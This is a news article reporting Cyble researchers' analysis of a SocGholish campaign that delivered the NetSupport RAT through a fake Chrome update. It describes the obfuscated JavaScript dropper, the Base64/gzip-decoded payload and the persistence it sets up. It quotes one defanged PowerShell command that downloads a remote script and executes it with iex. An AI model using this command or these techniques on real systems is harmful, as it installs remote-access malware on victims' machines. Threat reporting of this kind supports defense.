Security experts at the Cyble Research and Intelligence Labs (CRIL) reported a NetSupport (RAT) campaign run by the notorious SocGholish trojan gang. The trojan was being distributed to victims via a fake Google Chrome browser update.
The SocGholish campaign has been active since 2017 and uses several disciplines of social engineers to deploy malware-injected campaigns on victims. SocGholish is a JavaScript malware framework that can be used to impersonate various programs and websites, including but not limited to the internet browser, communication apps, and Flash Player.
However, in the campaign reported by Cyble, the perpetrators allegedly lured users to a Chrome update using a drive-by-download mechanism. Once the user visited the fake download page, the hacker pursued them to download the update, which looked identical to the standard Chrome browser updates.
Cyble analyzes the NetSupport (RAT) campaign
According to CRIL, the SocGholish threat actor hosted malicious websites that lured visitors into a call-to-action situation. Once the user’s attention was drawn toward the update, the threat actor used drive-by-download (JavaScript or Uniform Resource Locator (URL) redirections to convince the user to download it.
Once downloaded, the threat actor deployed an array of trojan and malware attacks, such as Cobalt Strike framework, ransomware, and others.
As per the report, the threat actor pursued the user into downloading a file named “Сhrome.Updаte.zip,” which was then saved in the user’s “Download” folder. Upon analyzing the download.zip file, security experts noted that it was a “heavily-obfuscated JavaScript file” with the name “AutoUpdater.js.” Once executed, it launched a PowerShell command to “download and execute an additional PowerShell script from the remote server.
The download.zip file used the following PowerShell command to download a new PowerShell script and invokes it using Invoke-Expression (iex). “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”
Upon further investigation, Cyble researchers found that the new PowerShell script was encoded with Base64, an encoding format for binary data designed to deal with ASCII. It was encoded with the [System.Convert]::FromBase64String method, and used a gzip decompression with a [System.IO.Compression.CompressionMode]::Decompress method.
Once decoded from the Base64 encoding, the file with an embedded payloads inside it used a deployment code for the “NetSupport RAT” application “whost.exe.” On being deployed, it dropped the payload, and the PowerShell script created a run entry for the “whost.exe” to start whenever the user logged into the system.
About NetSupport (RAT)
NetSupport Manager is a common RAT (Remote Administration Tool), available on underground hacking forums, and has been used previously to provide remote computer assistance to users— similar to other applications like TeamViewer, AnyDesk, and Quick Assist.
However, cybercriminals seem to have gotten used to NetSupport Manager as their primary tool to target victims using remote access. The RAT version of the program has been decentralized and used for internet-based cybercrime campaigns.
According to the post shared by Cyble, the NetSupport (RAT) can perform various malicious activities on the victim’s devices, including launching applications remotely, identifying crucial data on hard drives and networks as well as retrieving systems information.
